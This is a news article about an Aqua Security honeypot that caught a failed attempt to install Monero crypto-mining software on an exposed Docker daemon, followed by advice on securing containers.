The characteristics of cloud containers that make them attractive to data center managers also make them attractive to crypto-miners.
The ease of setup, the isolation and the performance advantages, coupled with the fact that containers may not enjoy the same level of security as hardware infrastructure, mean that an attacker can operate crypto-currency mining in relative safety and with a reduced risk of discovery.
Researchers at Aqua Security Software said that they’d heard about crypto-currency mining attacks on Docker containers and wanted to learn how they were carried out. They also wanted to check the operations of the Aqua Container Security Platform. To accomplish this, they set up a honeypot.
Honeypots are computers set up to attract cyber-attackers. They appear to be legitimate assets, but they usually don’t contain real data and they’re thoroughly instrumented and logged so that the attacker can be observed and to discover weaknesses can be fixed.
Honeypots are not new. Computers as honeypots have been around for decades. I first set one up to find out who was attempting to infiltrate a military computer system for which I was responsible in the mid-1980s, and I wasn’t the first.
In this case, the researchers at Aqua decided to create an unprotected Docker installation and waited to see what would happen. As the researchers explained in their blog, “We deployed a virtual machine, installed docker on it and exposed it to the internet.”
Notably, the folks at Aqua did not disable the HTTP port on the Docker daemon. They also deployed their Aqua Enforcer, which prevents unauthorized activities in containers, so even if the attacker was able to gain access, they wouldn’t be able to do anything useful.
Two days later, an attacker who had been scanning the internet for open container ports, found the Aqua honeypot and set to work. The attacker first determined the version of Docker that was installed, then started issuing commands for image and container management.
First the attacker tried to use the “docker import” function to download an image containing the crypto-currency mining software. Then the attacker tried the “docker create” command which invokes the container and provides the container ID. Normally that would be followed by a start command, but since the create command failed, the attacker was unable to get the malicious software installed and running.
So the attacker changed tactics using other Docker commands, which also failed. Eventually the attacker gave up the infiltration attempts to successfully install the Monero crypto-currency mining packages onto the Docker container environment.
But in the process of running the honeypot, the folks at Aqua learned some important lessons. First, they discovered that some of the attacks were coming from other compromised systems, so they notified the owners of those systems.
Second, they discovered a site in the Netherlands that was apparently controlling the activities of the crypto-miner where they found other tools for developing crypto-currency mining attacks.
So why use Docker as a base for crypto-currency attacks? Michael Cherny, head of research for Aqua said that he thinks that the isolation of the container plays a big role. “They probably hope that the server is big enough not to notice,” Cherny explained.
Containers are inviting targets because they usually run on large computers, including cloud servers, with plenty of compute resources that are perfect for running crypto-currency mining routines. The more compute power that’s available, the more crypto-currency attackers can mine at no cost to themselves.
He said that he’s seen that crypto-mining attacks have become very popular and that it’s extremely easy to deploy the software in a container. He also said that he’s noticed that containers are frequently not well protected, especially those used for testing, development or other non-production purposes.
The blog entry also noted that configuration errors create security holes. “Another factor is that for practical reasons, engineers may take configuration shortcuts to make their work easier.” Unfortunately, such shortcuts also make the work of the attacker much easier.
The lessons of this exercise are fairly straightforward. First, remember that a container is really a virtualization of the computer’s operating system, so it needs just as much protection as non-containerized operating system.
Second, remember that the container is isolated from everything else around it, which means that the activities that go on inside aren’t readily obvious, which means that you need to monitor what’s going on inside.
Third, don’t be stupid, which means don’t allow access that’s not encrypted and not authenticated, which means don’t allow HTTP access at all.
Finally, if you don’t need to use non-production environments for long periods of time, such as at night or over a weekend, consider shutting those computers down. It’s impossible to hack into a computer that’s turned off and it saves electricity.
It’s also important to remember that a crypto-currency mining attack might not do more than waste your server time and electricity, but it’s a sign of a more serious problem.
“While not the most malicious of attacks (data exfiltration or DDoS often have more devastating effects),” Aqua warns in its blog entry, “illicit use of cloud compute resources for mining crypto-currencies should be regarded as a big warning sign on the security posture of the mined environments—because if an attacker can run a rogue container that mines for bitcoin, they can probably run containers that do worse things.”
Finding a container that’s doing crypto-currency mining may not be the end of the world, but failure to do something about it can lead to finding something much worse. How would you like to discover that you’re hosting the command and control server for a massive ransomware operation? That could have consequences far beyond just a little wasted electricity.